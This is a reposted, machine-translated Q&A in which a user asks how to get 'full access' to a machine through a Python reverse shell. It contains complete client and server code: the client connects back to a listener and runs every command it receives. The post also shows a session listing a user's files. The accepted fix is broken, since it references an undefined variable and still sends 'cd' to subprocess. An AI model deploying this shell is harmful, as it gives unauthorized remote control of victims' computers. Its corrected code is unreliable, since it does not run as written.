[英]Reverse Shell Command with Python command gets stuck when trying to change directory
我正在嘗試使用帶有 python 的反向 shell 以完全權限獲得完全訪問權限。
連接建立后,我可以執行諸如“ipconfig”或“dir”之類的命令(盡管有時在獲得“dir”命令的結果之前我需要詢問兩次。
但是,當我嘗試使用“cd..”命令更改目錄時,它會卡住並且不返回任何內容。
這是我的客戶端文件:
import socket
import subprocess
SERVER_HOST = "192.168.1.81"
SERVER_PORT = 5003
s = socket.socket()
s.connect((SERVER_HOST, SERVER_PORT))
while True:
command = s.recv(1024).decode()
if command.lower() == "exit":
break
else:
output = subprocess.getoutput(command)
s.send(output.encode())
s.close()
這是我的服務器文件:
import socket
SERVER_HOST = "192.168.1.81"
SERVER_PORT = 5003
s = socket.socket()
s.bind((SERVER_HOST, SERVER_PORT))
s.listen(5)
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")
client_socket, client_address = s.accept()
print(f"{client_address[0]}:{client_address[1]} Connected!")
while True:
command = input("Enter the command you wanna execute:")
client_socket.send(command.encode())
if command.lower() == "exit":
break
else:
results = client_socket.recv(1024).decode()
print(results)
client_socket.close()
s.close()
這是我得到的以及卡住的地方:
Listening as 192.168.1.81:5003 ...
192.168.1.81:52553 Connected!
Enter the command you wanna execute:dir
Volume in drive C is Windows
Volume Serial Number is 7E4C-AD89
Directory of C:\Users\CobraCommander\PycharmProjects\Nuke
10/11/2020 08:45 AM <DIR> .
10/11/2020 08:45 AM <DIR> ..
10/11/2020 08:44 AM <DIR> .idea
10/11/2020 12:40 AM 0 Client.py
10/11/2020 08:45 AM 569 my_client.py
10/11/2020 12:40 AM 885 my_server.py
3 File(s) 1,454 bytes
3 Dir(s) 46,585,339,904 bytes free
Enter the command you wanna execute:cd..
# It gets stuck here, it does not return anything.
如何獲得對客戶端的完全訪問權限並執行任何可能的命令?
通過使用“os.chdir”方法在客戶端文件中使用“os”庫解決,如下所示:
import socket
import subprocess
import os # Import this library
SERVER_HOST = "192.168.1.81"
SERVER_PORT = 5003
s = socket.socket()
s.connect((SERVER_HOST, SERVER_PORT))
while True:
command = s.recv(1024).decode()
if data[:2].decode('utf-8') == 'cd':
os.chdir(data[3:].decode('utf-8')) # Use the method change directory called "os.chdir"
if command.lower() == "exit":
break
else:
output = subprocess.getoutput(command)
s.send(output.encode())
s.close()
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.